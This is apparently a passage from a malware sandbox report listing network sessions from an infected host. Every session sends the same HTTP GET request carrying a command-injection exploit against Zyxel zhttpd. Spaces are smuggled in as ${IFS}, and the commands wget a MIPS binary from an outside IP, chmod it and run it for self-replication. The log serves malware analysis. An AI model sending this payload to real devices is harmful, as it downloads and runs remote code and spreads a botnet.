                                                        Jan 28, 2024 10:12:56.472652912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5362192.168.2.145335086.204.221.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472677946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5363192.168.2.1439506137.13.208.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472706079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5364192.168.2.1435966201.37.176.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472764015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5365192.168.2.1443206118.169.213.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472804070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5366192.168.2.1442042195.101.125.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472824097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5367192.168.2.1452668216.87.175.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472846031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5368192.168.2.1434672111.131.230.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472882032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5369192.168.2.1451944124.155.30.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472906113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5370192.168.2.1444994179.241.8.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472942114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5371192.168.2.143311280.79.87.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472968102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5372192.168.2.1441380137.204.199.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472995043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5373192.168.2.1436020125.148.215.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473035097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5374192.168.2.1444190197.71.222.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473077059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5375192.168.2.145864259.106.87.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473103046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5376192.168.2.143446641.15.110.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473144054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5377192.168.2.1444224178.236.55.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473175049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5378192.168.2.144851040.64.123.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473227978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5379192.168.2.143452466.109.230.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473251104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5380192.168.2.1432804123.23.213.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473272085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5381192.168.2.1448128101.200.28.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473300934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5382192.168.2.143807650.58.156.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473351955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5383192.168.2.144640653.139.176.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473387957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5384192.168.2.144649825.38.26.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473423004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5385192.168.2.1459874188.105.0.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473469973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5386192.168.2.14537144.211.59.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473515034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5387192.168.2.1448424178.35.115.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473562002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5388192.168.2.1445168126.22.56.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473598957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5389192.168.2.1459828153.178.128.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473638058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5390192.168.2.1451672111.130.95.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473684072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5391192.168.2.144831687.28.192.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473732948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5392192.168.2.1445716112.93.179.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473750114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5393192.168.2.1449882103.38.145.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473875999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5394192.168.2.145497232.101.164.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473910093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5395192.168.2.1433484204.108.134.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.473975897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5396192.168.2.1451478199.204.193.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474016905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5397192.168.2.1436960221.241.139.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474039078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5398192.168.2.143996661.159.14.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474102020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5399192.168.2.145858280.213.113.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474136114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5400192.168.2.143801434.210.171.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474183083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5401192.168.2.1445732177.195.159.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474227905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5402192.168.2.1449544154.55.61.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474265099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5403192.168.2.1453490168.229.236.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474288940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5404192.168.2.143586818.135.26.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474327087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5405192.168.2.14518685.43.209.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474350929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5406192.168.2.144831247.80.183.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474383116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5407192.168.2.143731876.202.242.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474423885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5408192.168.2.144711645.91.108.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474467039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5409192.168.2.1457752177.208.223.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474509954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5410192.168.2.1447294130.41.184.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474530935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5411192.168.2.145166657.246.36.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474576950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5412192.168.2.143755838.125.27.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474626064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5413192.168.2.1457286146.185.51.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474668980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5414192.168.2.145341642.210.190.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474714041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5415192.168.2.1440694129.189.55.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474764109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5416192.168.2.146056639.177.157.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474792957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5417192.168.2.1450980196.104.201.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474821091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5418192.168.2.1454172110.220.217.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474872112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5419192.168.2.145218250.195.213.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474909067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5420192.168.2.1449120217.129.168.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474958897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5421192.168.2.1439848114.242.9.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.474956989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5422192.168.2.1437414163.86.205.113443
                                                        TimestampBytes transferredDirectionData
